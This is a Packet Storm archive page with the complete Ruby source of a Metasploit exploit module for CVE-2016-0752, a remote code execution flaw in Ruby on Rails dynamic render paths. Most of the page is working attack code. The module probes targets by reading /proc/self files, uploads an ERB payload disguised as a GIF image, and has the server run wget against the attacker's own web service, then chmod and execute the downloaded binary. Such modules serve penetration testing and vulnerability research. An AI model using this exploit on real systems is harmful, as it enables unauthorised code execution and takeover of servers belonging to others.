exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ruby on Rails Dynamic Render File Upload Remote Code Execution

Ruby on Rails Dynamic Render File Upload Remote Code Execution
Posted Oct 13, 2016
Site metasploit.com

This Metasploit module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This Metasploit module has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths. Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This Metasploit module does not use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the builtin rails server, use caution.

tags | exploit, remote, code execution, file upload, ruby
advisories | CVE-2016-0752
SHA-256 | 2fbf26de370b698bb74efc1d6c0140ccae69af739b14f4d4a7e3f03d0f400ca5

Ruby on Rails Dynamic Render File Upload Remote Code Execution

Change Mirror Download
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the explicit render
method when leveraging user parameters.
This module has been tested across multiple versions of Ruby on Rails.
The technique used by this module requires the specified
endpoint to be using dynamic render paths, such as the following example:

def show
render params[:id]
end

Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
can literally be any endpoint. This module doesnt use the log inclusion method of
exploitation due to it not being universal enough. Instead, a new code injection
technique was found and used whereby an attacker can upload temporary image files
against any POST endpoint and use them for the inclusion attack. Finally, you only
get one shot at this if you are testing with the builtin rails server, use caution.
},
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # necromanced old bug & discovered new vector rce vector
'John Poulin (forced-request)' # original render bug finder
],
'References' =>
[
[ 'CVE', '2016-0752'],
[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch
[ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
[ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'bsd'],
'Arch' => ARCH_X86,
'Payload' =>
{
'DisableNops' => true,
},
'Privileged' => false,
'Targets' =>
[
[ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2016'))
register_options(
[
Opt::RPORT(3000),
OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
], self.class)
end

def check

# this is the check for the dev environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2f"),
'method' => 'GET',
}, 60)

# if the page controller is dynamically rendering, its for sure vuln
if res and res.body =~ /render params/
return CheckCode::Vulnerable
end

# this is the check for the prod environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
'method' => 'GET',
}, 60)

# if we can read files, its likley we can execute code
if res and res.body =~ /ruby/
return CheckCode::Appears
end
return CheckCode::Safe
end

def on_request_uri(cli, request)
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end

def send_payload
@bd = rand_text_alpha(8+rand(8))
fn = rand_text_alpha(8+rand(8))
un = rand_text_alpha(8+rand(8))
pn = rand_text_alpha(8+rand(8))
register_file_for_cleanup("/tmp/#{@bd}")
cmd = "wget #{@service_url} -O /tmp/#{@bd};"
cmd << "chmod 755 /tmp/#{@bd};"
cmd << "/tmp/#{@bd}"
pay = "<%=`#{cmd}`%>"
print_status("uploading image...")
data = Rex::MIME::Message.new
data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
res = send_request_cgi({
'method' => 'POST',
'cookie' => @cookie,
'uri' => normalize_uri(datastore['URIPATH'], pn),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/
return true
else

# this is where we pull the log file
if leak_log
return true
end
end
return false
end

def leak_log

# path to the log /proc/self/fd/7
# this bypasses the extension check
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
'method' => 'GET',
}, 60)

if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
return true
end
return false
end

def start_http_server
@pl = generate_payload_exe
@elf_sent = false
downfile = rand_text_alpha(8+rand(8))
resource_uri = '/' + downfile
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end

# do not use SSL for the attacking web server
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end

@service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
service_url_payload = srv_host + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
connect
end

def render_tmpfile
@path.gsub!(/\//, '%2f')
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], @path),
'method' => 'GET',
}, 1)
end

def exploit
print_status("Sending initial request to detect exploitability")
start_http_server
if send_payload
print_good("injected payload")
render_tmpfile

# we need to delay, for the stager
select(nil, nil, nil, 5)
end
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close